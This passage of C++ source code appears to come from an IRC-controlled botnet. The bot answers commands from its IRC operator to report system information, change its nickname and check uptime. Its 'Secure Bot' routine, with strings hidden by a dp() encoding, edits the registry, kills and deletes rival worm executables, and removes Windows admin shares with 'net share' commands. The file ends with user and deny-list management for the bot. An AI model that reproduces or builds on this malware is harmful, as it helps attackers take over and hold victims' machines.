g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; } #endif return true; } // System Information else if(!pMsg->sCmd.Compare(m_cmdSysInfo.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); } // Find Files //else if(!pMsg->sCmd.Compare(m_cmdFindFiles.sName.CStr())) // { /* CString strMask = pMsg->sChatString.Token(1, " "); CString strDir = pMsg->sChatString.Token(2, " "); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, FindFiles(strMask, strDir), pMsg->sReplyTo.Str()); */ //} // Change Nickname else if(!pMsg->sCmd.Compare(m_cmdNick.sName.CStr())) { g_cMainCtrl.m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr()); g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), g_cMainCtrl.m_sUserName.CStr()); return true; } // Uptime check (default: 7d) else if(!pMsg->sCmd.Compare(m_cmdLongUptime.sName.CStr())) { int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iDays) iDays=7; CString sUptime=LongUptime(iDays); if(sUptime.Compare("")) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ sUptime.Str(), pMsg->sReplyTo.Str()); } return true; } // Secure Bot else if(!pMsg->sCmd.Compare(m_cmdSecure.sName.CStr())) { #ifdef WIN32 CString regLoc; regLoc = dp(45,15,6,20,23,1,18,5,80,39,9,3,18,15,19,15,6,20,80,49,9,14,4,15,23,19,80,29,21,18,18,5,14,20,48,5,18,19,9,15,14,80,44,21,14,0).CStr(); HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, dp(31,14,1,2,12,5,30,29,41,39,0).CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(45,19,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(9,18,21,14,72,78,5,24,5,0).CStr()); CString tmpBagle; GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(9,18,21,14,72,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(18,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(),dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(19,19,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(23,9,14,19,25,19,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(23,9,14,19,25,19,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(4,71,4,21,16,4,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(46,1,19,11,39,15,14,0).CStr()); RegCloseKey(hkey); KillProcess(dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(31,24,16,12,15,18,5,18,0).CStr()); RegCloseKey(hkey); system("net share c$ /delete /y"); system("net share d$ /delete /y"); system("net share ipc$ /delete /y"); system("net share admin$ /delete /y"); #endif return true; } return false; }
bool CMac::DelUser(CString sUsername) { if(!sUsername.CStr()) return false; user *pRemove=NULL; list<user*>::iterator i; for(i=luStart.begin(); i!=luStart.end(); ++i) { if(!(*i)->sUsername.Compare(sUsername)) pRemove=(*i); } if(pRemove) { luStart.remove(pRemove); delete pRemove; return true; } return false; }
void CMac::AddBadFunc(CString sFuncname, user *pUser) { if(!pUser || !sFuncname.CStr()) return; int iToken=0; while(sFuncname.Token(iToken, ":").Compare("")) { func *pFunc=new func; pFunc->sFuncname=sFuncname.Token(iToken, ":"); pUser->lDeny.push_back(pFunc); iToken++; } }